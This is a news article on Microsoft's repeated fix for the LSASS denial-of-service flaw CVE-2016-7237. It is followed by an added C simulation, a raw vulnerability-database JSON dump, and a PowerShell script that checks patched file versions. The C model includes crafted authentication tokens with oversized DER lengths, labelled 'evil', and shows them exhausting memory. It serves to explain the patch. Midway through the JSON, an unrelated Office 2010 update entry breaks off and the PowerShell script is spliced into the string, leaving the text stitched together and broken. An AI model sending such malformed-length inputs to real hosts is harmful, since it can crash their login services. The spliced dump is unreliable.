Microsoft’s second try at patching a vulnerability in a critical Windows process apparently is more successful than its first attempt.
Yesterday, as part of its monthly [Patch Tuesday release of security bulletins](<https://threatpost.com/microsoft-issues-record-low-number-of-patch-tuesday-bulletins/122999/>), Microsoft sent out an update that fixed a denial-of-service vulnerability in the Windows Local Security Authority Subsystem Service (LSASS). The update was in response to a private disclosure from researcher Nicolas Economou of Core Security, who reported that a patch released in November for the same bug was incomplete.
Core Security confirmed to Threatpost this morning that it had tested the patch and that the issue was resolved.
LSASS enforces Windows security policies around authentication and login verification. It is a critical process: if it crashes, Windows forces a reboot, which is what turns a memory-handling bug in it into a remote denial of service.
Yesterday’s bulletin, [MS17-004](<https://technet.microsoft.com/en-us/library/security/MS17-004>), was rated important by Microsoft for Vista, Windows Server 2008 (and R2), and Windows 7. An attacker using a specially crafted authentication request could remotely cause an automatic system reboot. Microsoft said it changed the way LSASS handles such requests.
The original patch, released Nov. 8 in [MS16-137](<https://technet.microsoft.com/en-us/library/security/MS16-137>), addressed a bug privately disclosed by researcher [Laurent Gaffie](<http://g-laurent.blogspot.com.ar/2016/11/ms16-137-lsass-remote-memory-corruption.html>), who said it affects all versions of Windows, from XP to Windows 10. Gaffie described the bug in his original report:
> “This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.
>
> “This allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.”
Gaffie said it was also possible that an attacker could leverage the crash for local privilege escalation; he published a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/LSASS>) once the first patch was distributed.
Core Security’s Economou, however, said that once he analyzed Gaffie’s PoC he found the vulnerability had been misunderstood. In a [technical description](<https://www.coresecurity.com/blog/unpatched-lsass-remote-denial-service-ms16-137>) published today, Economou said the fix was improperly applied.
Economou said the vulnerability can also be triggered on Windows 8 and 10. There, he said, an attacker would have to exhaust the LSASS service’s memory by other means rather than request a single “giant” allocation, which is the request that fails in older versions of Windows.
“I had been able to confirm that this vulnerability can be triggered in Windows 7 and 2008 R2 by establishing several SMB connections and sending evil sizes with values like 0x1000000 (16 MB). The problem is that in the case of the latest Windows versions, it’s not possible to use these kinds of sizes, because as I said before, the limit is 64KB,” Economou said. “So, the only way to trigger this vulnerability should be by producing a memory exhaustion in the LSASS service. It may be possible to do so by finding a controllable malloc in the LSASS authentication process, creating multiple connections and producing a memory exhaustion until the ‘LsapAllocateLsaHeap’ function fails. Maybe, this memory exhaustion condition could be easily reached in local scenarios.”
The incomplete patch left users exposed for two months. During that time, Microsoft said, it was not aware of any public exploits targeting the flaw. The new patch resolves the vulnerability, Economou said; on Windows 7 and Server 2008 R2 the fixed lsasrv.dll carries file version 6.1.7601.23642, the build he diffed.
“If we diff against the latest ‘lsasrv.dll’ version (v6.1.7601.23642), we can see that the vulnerability was fixed by changing the ‘NegGetExpectedBufferLength’ function,” Economou said. “Basically, the same 64KB packet size check used by Windows 8.1 and Windows 10 was now added to the rest of the Windows versions.”
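The length handling Gaffie describes, the multi-connection exhaustion Economou used on Windows 7, and the 64 KB check he found in the patched lsasrv.dll, as an added C model that is not code from the article, from Gaffie’s PoC, or from Microsoft. It parses the first DER length of a SPNEGO NegTokenResp (the 0xA1 context tag and the 0x84 long-form length byte are standard encoding; the token bytes themselves are constructed, not captured), hands the declared size to a stand-in for LsapAllocateLsaHeap with a 32 MiB budget (an assumed figure standing in for LSASS memory), and contrasts the unchecked policy with one that applies the 64 KB ceiling (the exact constant 0x10000 is assumed from Economou’s “64KB”). The function names neg_expected_length_unchecked, neg_expected_length_checked and lsa_heap_alloc are illustrative, not the real exports.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* 64 KiB ceiling that Economou reports for Windows 8.1/10 and for the patched
 * lsasrv.dll. The exact constant is an assumption based on his "64KB". */
#define MAX_EXPECTED_TOKEN 0x10000u

/* Constructed stand-in for the memory available to LSASS: 32 MiB. */
#define SIMULATED_LSA_HEAP (32u << 20)

static uint32_t lsa_heap_used;

/* Stand-in for LsapAllocateLsaHeap: succeeds until the constructed budget is spent. */
static int lsa_heap_alloc(uint32_t size)
{
    if (size > SIMULATED_LSA_HEAP - lsa_heap_used)
        return 0;                       /* the failure that took lsass.exe down */
    lsa_heap_used += size;
    return 1;
}

/* Decode one DER length starting at p. Returns bytes consumed, or 0 on a
 * truncated, indefinite (0x80) or over-long (more than 4 byte) length. */
static size_t der_length(const uint8_t *p, size_t avail, uint32_t *out)
{
    if (avail == 0)
        return 0;
    if (p[0] < 0x80) {                  /* short form: one byte */
        *out = p[0];
        return 1;
    }
    unsigned n = p[0] & 0x7f;           /* 0x84 -> four length bytes, a full 32-bit value */
    if (n == 0 || n > 4 || avail < 1 + (size_t)n)
        return 0;
    uint32_t v = 0;
    for (unsigned i = 0; i < n; i++)
        v = (v << 8) | p[1 + i];
    *out = v;
    return 1 + n;
}

/* Pre-fix policy: the declared content length of the [1] NegTokenResp is
 * accepted as the expected buffer length, whatever it says. */
int neg_expected_length_unchecked(const uint8_t *tok, size_t avail, uint32_t *expected)
{
    uint32_t len;
    if (avail < 1 || tok[0] != 0xA1)    /* NegTokenResp is context tag [1] */
        return 0;
    if (der_length(tok + 1, avail - 1, &len) == 0)
        return 0;
    *expected = len;
    return 1;
}

/* Post-fix policy: same parse, then reject non-minimal length encodings
 * (DER forbids them) and anything above the 64 KiB ceiling. */
int neg_expected_length_checked(const uint8_t *tok, size_t avail, uint32_t *expected)
{
    uint32_t len;
    if (avail < 1 || tok[0] != 0xA1)
        return 0;
    size_t hdr = der_length(tok + 1, avail - 1, &len);
    if (hdr == 0)
        return 0;
    if (hdr >= 2) {                     /* long form must be the shortest that fits */
        uint32_t minimum = (hdr == 2) ? 0x80u : (1u << (8 * (hdr - 2)));
        if (len < minimum)
            return 0;
    }
    if (len > MAX_EXPECTED_TOKEN)
        return 0;
    *expected = len;
    return 1;
}

/* Out-param-free wrappers: the parsed length, or -1 if the policy rejects the token. */
long long unchecked_len(const uint8_t *tok, size_t avail)
{
    uint32_t v;
    return neg_expected_length_unchecked(tok, avail, &v) ? (long long)v : -1;
}

long long checked_len(const uint8_t *tok, size_t avail)
{
    uint32_t v;
    return neg_expected_length_checked(tok, avail, &v) ? (long long)v : -1;
}

/* Drive `connections` authentication attempts, each carrying the same token,
 * through a length policy and the stand-in heap. Returns the 1-based attempt
 * on which the heap allocation failed, 0 if every attempt was served, or -1
 * if the policy rejected the token before any allocation. */
int simulate_connections(int (*policy)(const uint8_t *, size_t, uint32_t *),
                         const uint8_t *tok, size_t toklen, int connections)
{
    lsa_heap_used = 0;
    for (int i = 1; i <= connections; i++) {
        uint32_t need;
        if (!policy(tok, toklen, &need))
            return -1;
        if (!lsa_heap_alloc(need))
            return i;
    }
    return 0;
}

/* Constructed sample tokens (not captured traffic): [1] tag, DER length, filler. */
const uint8_t benign_token[]    = { 0xA1, 0x82, 0x01, 0x2C, 0x30, 0x82, 0x01, 0x28 }; /* 300 bytes */
const uint8_t evil_16mb_token[] = { 0xA1, 0x84, 0x01, 0x00, 0x00, 0x00, 0x30, 0x00 }; /* 0x01000000 */
const uint8_t evil_4gb_token[]  = { 0xA1, 0x84, 0xFF, 0xFF, 0xFF, 0xFF, 0x30, 0x00 }; /* 0xFFFFFFFF */
const uint8_t padded_token[]    = { 0xA1, 0x82, 0x00, 0x10, 0x30, 0x0E, 0x00, 0x00 }; /* 16, non-minimal */

int main(void)
{
    printf("unchecked, 16 MiB x5: heap failed on connection %d\n",
           simulate_connections(neg_expected_length_unchecked, evil_16mb_token, sizeof evil_16mb_token, 5));
    printf("checked,   16 MiB x5: result %d (-1 = rejected before allocation)\n",
           simulate_connections(neg_expected_length_checked, evil_16mb_token, sizeof evil_16mb_token, 5));
    printf("checked,   benign x5: result %d (0 = all served)\n",
           simulate_connections(neg_expected_length_checked, benign_token, sizeof benign_token, 5));
    return 0;
}
```

With the unchecked policy the 16 MiB token is served twice and the third connection’s allocation fails, which is the “several SMB connections” pattern Economou reports for Windows 7 and 2008 R2; the 0xFFFFFFFF token fails on the first. The checked policy rejects both before any allocation, so against 8.1, 10 and the re-patched builds an attacker is left needing a separate memory-exhaustion primitive, exactly the harder path Economou describes. The minimal-encoding test is an extra DER rule beyond the 64 KB cap the article reports; it costs nothing and removes a second way of smuggling an oversized length through a lenient parser.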
Michael Mimoso, Threatpost, Jan. 11, 2017 (updated Jan. 18, 2017). Original: https://threatpost.com/second-try-at-windows-lsass-patch-addresses-vulnerability/123015/ . The flaw is tracked as CVE-2016-7237.
{"mscve": [{"lastseen": "2021-12-06T18:25:24", "description": "A denial of service vulnerability exists in the Windows Local Security Authority Subsystem Service (LSASS). A remote, but authenticated, attacker who successfully exploited this vulnerability could cause the target system to become nonresponsive.\n\nTo exploit the vulnerability, a remote attacker would first have to log on to the system and send a specially crafted request to the target system.\n\nThe security update addresses the vulnerability by changing the way that LSASS handles specially crafted requests.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-08T08:00:00", "type": "mscve", "title": "Local Security Authority Subsystem Service Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7237"], "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7237", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-7237", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}], "mskb": [{"lastseen": "2022-06-15T15:21:30", "description": "None\n## Summary\n\nThis security update 
resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege. To exploit this vulnerability, the attacker would first have to authenticate to the targeted domain-joined system by using valid user credentials. An attacker who successfully exploited this vulnerability could elevate their permissions from unprivileged user account to administrator. The attacker could then create accounts, install programs, or view, change, or delete data. The attacker could then try to elevate privilege locally by executing a specially crafted application that could manipulate NTLM password change requests. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin MS16-137](<https://technet.microsoft.com/library/security/ms16-137>). \n\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you require before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n### Known issues in this security update\n\nUser-initiated and programmatic password changes to domain user accounts may fail if the same user account is logged on to more than one computer at the same time and is used to make password changes to the same user account from two or more computers. Such password changes fail only if NTLM is used. \n \nSpecifically, the following errors are returned: \n \nHexadecimal| Decimal| Error ID| Error description \n---|---|---|--- \n0xc0000388| 1073740920| STATUS_DOWNGRADE_DETECTED| The system detected a possible attempt to compromise security. Please make sure that you can contact the server that authenticated you. \n0x4f1| 1265| ERROR_DOWNGRADE_DETECTED| The system detected a possible attempt to compromise security. 
Please make sure that you can contact the server that authenticated you. \n \n\n\n#### Example scenario\n\n 1. A domain user logs on to computer A and computer B.\n 2. The user changes their domain password from computer A without logging off computer B.\n 3. The domain user tries to change their password from computer B.\nIn this scenario, the password change attempt from computer B may fail with the following error message: \n \n\n\nThe system detected a possible attempt to compromise security. Please make sure that you can contact the server that authenticated you. \n\n\n \nIf the password change is performed programmatically, you may receive either an ERROR_DOWNGRADE_DETECTED or a STATUS_DOWNGRADE_DETECTED error status. This behavior occurs when the NTLM authentication package is used for the password change for domain accounts if Kerberos fails to find a domain controller and then falls back to NTLM. In this scenario, NTLM fallback was disabled by [MS16-101](<https://technet.microsoft.com/library/security/ms16-101>) and was re-enabled by [MS16-137](<https://technet.microsoft.com/library/security/ms16-137>)-related updates. \n \n \nCalling NTLM directly also causes password changes to fail in this scenario. To resolve all domain password change issues, make sure that Kerberos is functional, and also make sure that Kerberos is used for password changes to domain accounts. For more information, see the \"Known issue 1\" section in KB [3167679](<http://support.microsoft.com/en-us/help/3167679>). \n\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see \n[Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). 
\n \nNote For Windows RT 8.1, this update is available through Windows Update only. \n\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=3198510>) website. \n\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Support for Microsoft Update](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Troubleshooting and Support](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Virus Solution and Security Center](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB3198510-ia64.msu| EA36EA5822944918E9C4C456CAD5CA9E8D3CC62C| 98D8D328E49BEEC6818F459429AD8977F278E44EE799038CAAF5EBC5F2EA6109 \nWindows6.0-KB3198510-x64.msu| BBB5BA6DB6EF138C633614FB6C9B7ED5C5662287| 2C1A9B41D95ACAB92AAE8B33D5346B58AB0937EE5EC626DA3F1E14E0535141BD \nWindows6.0-KB3198510-x86.msu| E4DB0F0831CA873DDDDA03AE761FEC4550F5D2BA| 1D9E5D1AD53F06BB2A21401D5D48982F3BCDC429B59E67B735A59E643980E580 \n \n\n\n## \n\n__\n\nFile information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.Windows Vista and Windows Server 2008 file informationNotes: The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed. 
\nAdvapi32.dll.mui| 6.0.6002.24025| 376,832| 08-Oct-2016| 16:13| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:19| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:21| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:30| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 389,120| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:31| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:23| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 356,352| 08-Oct-2016| 16:26| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 348,160| 08-Oct-2016| 16:20| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86 \nAdvapi32.dll| 6.0.6002.24025| 802,816| 08-Oct-2016| 15:15| x86 \nBcrypt.dll| 6.0.6002.19677| 274,944| 10-Aug-2016| 13:13| x86 \nBcrypt.dll| 6.0.6002.24004| 274,944| 08-Oct-2016| 13:13| x86 \nLsasrv.dll.mui| 6.0.6002.24025| 53,248| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:09| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:12| Not applicable 
\nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,776| 08-Oct-2016| 16:12| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 57,344| 08-Oct-2016| 15:20| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 8,704| 08-Oct-2016| 15:21| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 69,632| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 53,248| 08-Oct-2016| 16:00| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:02| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:02| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 40,960| 08-Oct-2016| 16:06| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:08| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 40,960| 08-Oct-2016| 16:13| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:15| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:08| Not applicable 
\nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:12| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:14| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 65,536| 08-Oct-2016| 16:15| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:17| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:01| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,776| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:14| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:16| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 61,440| 08-Oct-2016| 16:02| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:03| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 28,672| 08-Oct-2016| 16:11| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:13| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 32,768| 08-Oct-2016| 16:08| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 11,264| 08-Oct-2016| 16:10| Not applicable \nKsecdd.sys| 6.0.6002.19655| 440,552| 11-May-2016| 13:09| x86 \nLsasrv.dll| 6.0.6002.19701| 1,259,008| 08-Oct-2016| 15:50| x86 \nLsasrv.mof| Not applicable| 13,780| 03-Apr-2009| 21:30| Not applicable \nLsass.exe| 6.0.6002.18541| 9,728| 16-Nov-2011| 14:12| x86 \nSecur32.dll| 6.0.6002.19623| 72,704| 18-Mar-2016| 17:10| x86 \nKsecdd.sys| 6.0.6002.23970| 440,552| 11-May-2016| 13:07| x86 \nLsasrv.dll| 6.0.6002.24025| 1,262,592| 08-Oct-2016| 15:17| x86 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nLsass.exe| 6.0.6002.24025| 9,728| 08-Oct-2016| 14:24| x86 \nSecur32.dll| 6.0.6002.24025| 72,704| 08-Oct-2016| 15:18| x86 \nNcrypt.dll| 6.0.6002.19678| 206,336| 10-Aug-2016| 15:43| x86 \nNcrypt.dll| 6.0.6002.24025| 205,312| 08-Oct-2016| 15:17| x86 \nRpcrt4.dll| 6.0.6002.19598| 783,872| 06-Feb-2016| 02:12| x86 \nRpcrt4.dll| 
6.0.6002.24025| 783,872| 08-Oct-2016| 15:18| x86 \nWdigest.dll| 6.0.6002.19659| 175,616| 14-May-2016| 15:41| x86 \nWdigest.dll| 6.0.6002.24025| 175,616| 08-Oct-2016| 15:18| x86 \nMsv1_0.dll| 6.0.6002.19701| 219,136| 08-Oct-2016| 15:51| x86 \nMsv1_0.dll| 6.0.6002.24025| 219,136| 08-Oct-2016| 15:17| x86 \nSchannel.dll| 6.0.6002.19678| 284,160| 10-Aug-2016| 15:44| x86 \nSchannel.dll| 6.0.6002.24025| 284,672| 08-Oct-2016| 15:18| x86 \nMrxsmb10.sys| 6.0.6002.19431| 217,088| 27-Jun-2015| 14:21| x86 \nMrxsmb10.sys| 6.0.6002.24025| 217,088| 08-Oct-2016| 14:18| x86 \nMrxsmb20.sys| 6.0.6002.19431| 81,408| 27-Jun-2015| 14:21| x86 \nMrxsmb20.sys| 6.0.6002.24025| 82,432| 08-Oct-2016| 14:17| x86 \nMrxsmb.sys| 6.0.6002.19279| 107,008| 09-Jan-2015| 00:17| x86 \nMrxsmb.sys| 6.0.6002.24025| 107,520| 08-Oct-2016| 14:17| x86 \n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-08T08:00:00", "type": "mskb", "title": "MS16-137: Description of the security update for Windows authentication methods: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7237"], "modified": "2016-11-08T08:00:00", "id": "KB3198510", 
"href": "https://support.microsoft.com/en-us/help/3198510", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T22:49:52", "description": "<html><body><p>Description of the security update for Office 2010: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" class=\"managed-link content-anchor-link\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
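As a practitioner check added here (this is not code from the article, from Core Security or from Microsoft), the PowerShell below reads the installed versions of lsasrv.dll and msv1_0.dll, the two modules the KB3198510 manifest shows rebuilt on 08-Oct-2016 in both servicing branches, and compares each against the baseline of its own branch. The baseline versions are the ones in the file table; the rule that revisions of 22000 and above are LDR builds, the function names and the Windows 6.0.6002 check are assumptions of this example.

```powershell
# Added example (not code from the article, Core Security or Microsoft).
# Verifies that an x86 Windows 6.0.6002 host (Vista SP2 / Server 2008 SP2)
# carries at least the KB3198510 (MS16-137) builds of lsasrv.dll and
# msv1_0.dll. Baseline versions are taken from the KB3198510 file table.
# Assumption: revisions of 22000 and above are LDR (hotfix) builds and lower
# revisions are GDR builds, so a file is compared only with its own branch.

$Baseline = @{
    'lsasrv.dll' = @{
        GDR = [System.Version]'6.0.6002.19701'
        LDR = [System.Version]'6.0.6002.24025'
    }
    'msv1_0.dll' = @{
        GDR = [System.Version]'6.0.6002.19701'
        LDR = [System.Version]'6.0.6002.24025'
    }
}

function Get-ServicingBranch {
    # A plain numeric compare across branches is wrong: 6.0.6002.23970 is
    # higher than the GDR baseline 6.0.6002.19701 but is an unpatched LDR build.
    param([System.Version]$Version)
    if ($Version.Revision -ge 22000) { 'LDR' } else { 'GDR' }
}

function Get-FileVersionObject {
    # Build the version from the numeric fields; the FileVersion string on
    # these builds can carry a build-lab suffix that does not parse as a Version.
    param([string]$Path)
    $vi = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($Path)
    New-Object System.Version -ArgumentList @($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
}

function Test-Ms16137File {
    # Returns one row: which branch the file is on, the branch baseline,
    # and whether the installed build meets it.
    param([string]$Name, [System.Version]$Installed)
    $branch  = Get-ServicingBranch $Installed
    $minimum = $Baseline[$Name][$branch]
    New-Object PSObject -Property @{
        File      = $Name
        Branch    = $branch
        Installed = $Installed.ToString()
        Minimum   = $minimum.ToString()
        Patched   = ($Installed -ge $minimum)
    }
}

# The baseline only describes build 6.0.6002; warn elsewhere rather than misreport.
$os = [System.Environment]::OSVersion.Version
if ($os.Major -ne 6 -or $os.Minor -ne 0 -or $os.Build -ne 6002) {
    Write-Warning "Baseline is for Windows 6.0.6002 (Vista SP2 / Server 2008 SP2); this host reports $os"
}

$report = @()
foreach ($name in $Baseline.Keys) {
    $path = Join-Path $env:SystemRoot "System32\$name"
    if (Test-Path -LiteralPath $path) {
        $report += Test-Ms16137File -Name $name -Installed (Get-FileVersionObject $path)
    } else {
        Write-Warning "$path not found"
    }
}
$report | Format-Table File, Branch, Installed, Minimum, Patched -AutoSize
```

Reading version resources needs no elevated rights, so the script runs from an ordinary prompt on the host. A result of Patched = True only shows that the MS16-137 binaries are in place; as the article explains, that fix was incomplete, so the host still needs MS17-004, whose replacement files should carry higher revisions and will also pass this comparison. The table the baseline comes from covers x86 only; on x64 the same module names live in System32, but this page gives no x64 manifest to compare against.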
